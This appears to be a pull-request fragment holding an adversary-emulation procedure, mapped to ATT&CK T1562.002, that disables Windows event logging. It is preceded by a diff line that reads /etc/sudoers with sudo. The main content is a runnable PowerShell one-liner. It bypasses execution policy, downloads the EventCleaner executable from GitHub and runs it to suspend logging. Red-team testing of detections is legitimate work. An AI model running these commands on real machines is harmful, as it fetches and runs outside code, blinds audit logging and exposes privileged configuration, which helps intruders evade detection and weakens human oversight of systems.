+        sudo cat /etc/sudoers;


### PR DESCRIPTION
id: 8feb27ce-63db-472f-b8e9-038134e9d79a
metadata:
  version: 1
  authors:
    - Archie Pocsedio
  tags: destructive
name: Disable Windows EventLog via EventCleaner
description: |
  This procedure will stop eventlog using EventCleaner tools.
tactic: defense-evasion
technique:
  id: T1562.002
  name: Impair Defenses: Disable Windows Event Logging
platforms:
  windows:
    cmd:
      command: powershell.exe -exec bypass -C "(New-Object Net.WebClient).DownloadFile('https://github.com/QAX-A-Team/EventCleaner/blob/master/x64/Release/EventCleaner.exe?raw=true','EventCleaner.exe')";.\EventCleaner.exe suspend